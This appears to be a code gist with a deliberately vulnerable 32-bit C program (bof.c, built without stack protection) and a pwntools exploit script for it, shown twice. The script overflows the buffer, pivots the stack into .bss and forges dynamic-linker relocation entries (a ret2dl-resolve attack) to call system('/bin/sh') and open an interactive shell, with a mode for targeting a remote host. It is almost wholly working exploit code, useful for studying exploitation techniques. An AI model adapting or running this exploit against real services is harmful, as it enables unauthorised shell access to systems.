icchy/bof.c

## bof.c
/*
gcc -m32 -fno-stack-protector $@
*/
#include <unistd.h>

int main()
{
    char buf[100];
    int size;
    read(0, &size, 4);
    read(0, buf, size);
    write(1, buf, size);
    return 0;
}

## exploit.py
from pwn import *

context(os='linux', arch='i386')
# context.log_level = 'debug' # output verbose log

RHOST = "0"
RPORT = 54321
LHOST = "127.0.0.1"
LPORT = 54321

conn = None

if len(sys.argv) > 1 and sys.argv[1] == 'r':
    conn = remote(RHOST, RPORT)
elif len(sys.argv) > 1 and sys.argv[1] == 'l':
    conn = remote(LHOST, LPORT)
else:
    conn = process(['./bof'])
    # conn = process(['./bof'], env={'LD_PRELOAD': ''})

# libc = ELF('')
elf = ELF('./bof')

def get_section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

# preparing for exploitation

bufsize = 100

addr_dynsym = get_section_addr('.dynsym')
addr_dynstr = get_section_addr('.dynstr')
addr_relplt = get_section_addr('.rel.plt')
addr_plt = get_section_addr('.plt')
addr_bss = get_section_addr('.bss')
addr_plt_read = elf.plt['read']
addr_got_read = elf.got['read']

addr_pop3 = 0x0804851d
addr_pop_ebp = 0x0804851f
addr_leave_ret = 0x080483b8

stack_size = 0x800
base_stage = addr_bss + stack_size

addr_reloc = base_stage + 20
addr_sym = addr_reloc + 8
align_dynsym = 0x10 - ((addr_sym - addr_dynsym) & 0xf)
addr_sym += align_dynsym
addr_symstr = addr_sym + 16
addr_cmd = addr_symstr + 7

reloc_ofs = addr_reloc - addr_relplt
r_info = ((addr_sym - addr_dynsym) << 4) & ~0xff | 0x7
st_name = addr_symstr - addr_dynstr

log.info('Pwning')

buf1 = 'A' * bufsize
buf1 += 'AAAA' * 3
buf1 += pack(addr_plt_read) + pack(addr_pop3) + pack(0) + pack(base_stage) + pack(100)
buf1 += pack(addr_pop_ebp) + pack(base_stage) + pack(addr_leave_ret)

buf2 = 'AAAA'
buf2 += pack(addr_plt)
buf2 += pack(reloc_ofs) + 'AAAA' + pack(addr_cmd)
buf2 += pack(addr_got_read)
buf2 += pack(r_info)
buf2 += 'A' * align_dynsym
buf2 += pack(st_name)
buf2 += pack(0)
buf2 += pack(0)
buf2 += pack(0x12)
buf2 += 'system\x00'
buf2 += '/bin/sh\x00'
buf2 += 'A' * (100-len(buf2))

conn.send(pack(len(buf1)))
conn.send(buf1)
log.info('read: %r' % conn.read(len(buf1)))

conn.send(buf2)

conn.interactive()
	/*
	gcc -m32 -fno-stack-protector $@
	*/
	#include <unistd.h>

	int main()
	{
	char buf[100];
	int size;
	read(0, &size, 4);
	read(0, buf, size);
	write(1, buf, size);
	return 0;
	}
	from pwn import *

	context(os='linux', arch='i386')
	# context.log_level = 'debug' # output verbose log

	RHOST = "0"
	RPORT = 54321
	LHOST = "127.0.0.1"
	LPORT = 54321

	conn = None

	if len(sys.argv) > 1 and sys.argv[1] == 'r':
	conn = remote(RHOST, RPORT)
	elif len(sys.argv) > 1 and sys.argv[1] == 'l':
	conn = remote(LHOST, LPORT)
	else:
	conn = process(['./bof'])
	# conn = process(['./bof'], env={'LD_PRELOAD': ''})

	# libc = ELF('')
	elf = ELF('./bof')

	def get_section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	# preparing for exploitation

	bufsize = 100

	addr_dynsym = get_section_addr('.dynsym')
	addr_dynstr = get_section_addr('.dynstr')
	addr_relplt = get_section_addr('.rel.plt')
	addr_plt = get_section_addr('.plt')
	addr_bss = get_section_addr('.bss')
	addr_plt_read = elf.plt['read']
	addr_got_read = elf.got['read']

	addr_pop3 = 0x0804851d
	addr_pop_ebp = 0x0804851f
	addr_leave_ret = 0x080483b8

	stack_size = 0x800
	base_stage = addr_bss + stack_size

	addr_reloc = base_stage + 20
	addr_sym = addr_reloc + 8
	align_dynsym = 0x10 - ((addr_sym - addr_dynsym) & 0xf)
	addr_sym += align_dynsym
	addr_symstr = addr_sym + 16
	addr_cmd = addr_symstr + 7

	reloc_ofs = addr_reloc - addr_relplt
	r_info = ((addr_sym - addr_dynsym) << 4) & ~0xff \| 0x7
	st_name = addr_symstr - addr_dynstr

	log.info('Pwning')

	buf1 = 'A' * bufsize
	buf1 += 'AAAA' * 3
	buf1 += pack(addr_plt_read) + pack(addr_pop3) + pack(0) + pack(base_stage) + pack(100)
	buf1 += pack(addr_pop_ebp) + pack(base_stage) + pack(addr_leave_ret)

	buf2 = 'AAAA'
	buf2 += pack(addr_plt)
	buf2 += pack(reloc_ofs) + 'AAAA' + pack(addr_cmd)
	buf2 += pack(addr_got_read)
	buf2 += pack(r_info)
	buf2 += 'A' * align_dynsym
	buf2 += pack(st_name)
	buf2 += pack(0)
	buf2 += pack(0)
	buf2 += pack(0x12)
	buf2 += 'system\x00'
	buf2 += '/bin/sh\x00'
	buf2 += 'A' * (100-len(buf2))

	conn.send(pack(len(buf1)))
	conn.send(buf1)
	log.info('read: %r' % conn.read(len(buf1)))

	conn.send(buf2)

	conn.interactive()